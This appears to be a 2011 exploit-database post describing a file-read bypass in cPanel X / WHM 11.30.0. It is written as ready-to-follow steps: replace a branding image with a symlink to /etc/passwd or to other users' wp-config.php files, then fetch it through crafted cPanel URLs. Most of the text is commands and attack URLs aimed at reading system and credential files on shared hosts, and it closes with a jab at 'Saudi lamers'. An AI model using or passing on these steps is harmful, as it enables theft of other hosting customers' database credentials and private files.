# cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass !!
# Version : 11.30.0 <Build 27>
# Author : ZxH-Labs
# Date : 1st OF Jun 2011
# Tested On CentOS
# Software Link : http://www.cpanel.net
# Home: 1337day.com Inj3ct0r Exploit DataBase
[+] Exploiting cPanel x ....
At First , You Must've Reseller Account < Note : We'll Not Need To 2086 Port :)
Okay Now Open SSH or File Manager Then Go to
/home/user/cpanelbranding/x3
Note : You Can Change x3 Template To Template That You're Running
Okay Now Exeute This Command To Delete File And Make Symlink To read it
# 0x01 : z1d@dns.j0 [~/cpanelbranding/x3]# rm ui_sprites_bg_snap_to_smallest_width.png
# 0x02 : z1d@dns.j0 [~/cpanelbranding/x3]# ln -s /etc/passwd ui_sprites_bg_snap_to_smallest_width.png
The Second Will Work Successfuly Without Any Problem'z !
Okay .. Now If You Want to Read Another File .. So You've To Check Files If You can Read it or No
So .. Execute This Command :
# 0x021 : z1d@dns.j0 [~/]# ls -dl /home/*/public_html/ | grep drwxr-xr-x
You'll Get Some Path'z .. So You Can Read it Easily
# 0x03 : z1d@dns.j0 [~/cpanelbranding/x3]# ln -s /home/user/public_html/wp-config.php sprites_bg_snap_to_smallest_width.png
Note : /home/user/public_html Must be Chmoded 755 / drwxr-xr-x
[+] Reading Data From cPanel X ...
Okay .. We've Finished The First Part .. Now We Want To Read Files / Symlinks !
Okay Now Go 2 cPanel X
# 0x01 : http://domain.com/net/..etc:2082
# 0x02 : http://ip:2082
# 0x03 : https://domain.com/net/..etc:2082
# 0x04 : https://ip:2082
Now Show Source And Search About "ui_sprites_bg_snap_to_smallest_width.png"
You'll See This
"("/cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png");}#ui-aqua-hd-bg{background-position:"
Now Add The Path To Your cPanel To Get File
[+] Full Exploit of cPanel X ...
Now You'll Open This Link
# 0x01 : http://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x02 : http://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x03 : https://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x04 : https://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
[+] Note For All
We All Have More And More exploits For cPanel X But I Want You 2 Know That All exploit'z Will Not bypass Forbidden .. Only if file has 755 Permission
However I Hate Lamer'z :) .. Especially Saudi'z Lamer'z !
./b0x-j0
[+] Greet'z 2 All Friend'z and 1337day.com (Inj3ct0r Team)